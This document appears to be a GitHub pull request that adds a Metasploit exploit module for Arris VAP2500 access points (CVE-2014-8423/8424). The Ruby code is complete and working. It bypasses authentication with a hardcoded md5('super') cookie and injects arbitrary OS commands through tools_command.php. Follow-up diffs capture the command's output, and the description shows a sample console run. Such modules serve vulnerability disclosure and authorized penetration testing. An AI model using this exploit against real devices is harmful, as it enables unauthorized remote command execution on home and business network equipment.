### PR TITLE
Add module for Arris VAP2500 Remote Command Execution

### DIFF
--- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb
+++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Arris VAP2500 tools_command.php Command Execution',
+      'Description' => %q{
+        Arris VAP2500 access points are vulnerable to OS command injection in the web management
+        portal via the tools_command.php page. Though authentication is required to access this
+        page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid
+        username.
+      },
+      'Author'      =>
+        [
+          'HeadlessZeke' # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-8423'],
+          ['CVE', '2014-8424'],
+          ['OSVDB', '115045'],
+          ['OSVDB', '115046'],
+          ['BID', '71297'],
+          ['BID', '71299'],
+          ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']
+        ],
+      'DisclosureDate' => 'Nov 25 2014',
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1024
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DefaultTarget' => 0
+      ))
+  end
+
+  def check
+    begin
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri' => '/tools_command.php',
+        'headers' => {
+          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
+          }
+      })
+      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
+        return Exploit::CheckCode::Vulnerable
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    uri = '/tools_command.php'
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'vars_post' => {
+          'cmb_header'  => '',
+          'txt_command' => payload.encoded
+        },
+        'method' => 'POST',
+        'headers' => {
+          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
+          }
+      })
+      if res and res.code == 200 and res.body.to_s =~ /TOOLS - COMMAND/
+        print_good("#{peer} - Command sent successfully")
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

--- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb
+++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
           }
       })
-      if res and res.code == 200 and res.body.to_s =~ /TOOLS - COMMAND/
+      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
         print_good("#{peer} - Command sent successfully")
       else
         fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")

--- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb
+++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb
@@ -77,13 +77,15 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Exploiting...")
 
     uri = '/tools_command.php'
+    beg_boundary = rand_text_alpha(8)
+    end_boundary = rand_text_alpha(8)
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'vars_post' => {
           'cmb_header'  => '',
-          'txt_command' => payload.encoded
+          'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
         },
         'method' => 'POST',
         'headers' => {
@@ -92,6 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
       })
       if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
         print_good("#{peer} - Command sent successfully")
+        if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
+          print_status("#{peer} - Command output: #{$1}")
+        end
       else
         fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
       end


### PR DESCRIPTION
This module is for exploiting vulnerable Arris VAP2500 access points using CVE-2014-8423 and CVE-2014-8424. The vulns in question are both in the web mgmt portal of the device: an auth bypass via setting a cookie p=md5(username) and a command injection in the tools_command.php page. The module makes an initial GET request using the cookie auth bypass and checks the result for the purposes of verifying vulnerability. If vulnerable, it makes a subsequent POST request setting the cmb_header param to '' and the txt_command param to the value of CMD specified in the module options. This can be verified against VAP2500 devices running firmware < 08.41 (which I can provide if needed) or by running the vulnerable version of the web mgmt portal in a standalone fashion from an extracted firmware image.

Example console output:

```
msf exploit(vap2500_tools_command_exec) > show options

Module options (exploit/linux/http/vap2500_tools_command_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    127.0.0.1        yes       The target address
   RPORT    80               yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD                    yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vap2500_tools_command_exec) > set CMD whoami
CMD => whoami
msf exploit(vap2500_tools_command_exec) > exploit

[*] 127.0.0.1:80 - Trying to access the device ...
[*] 127.0.0.1:80 - Exploiting...
[+] 127.0.0.1:80 - Command sent successfully
msf exploit(vap2500_tools_command_exec) >
```
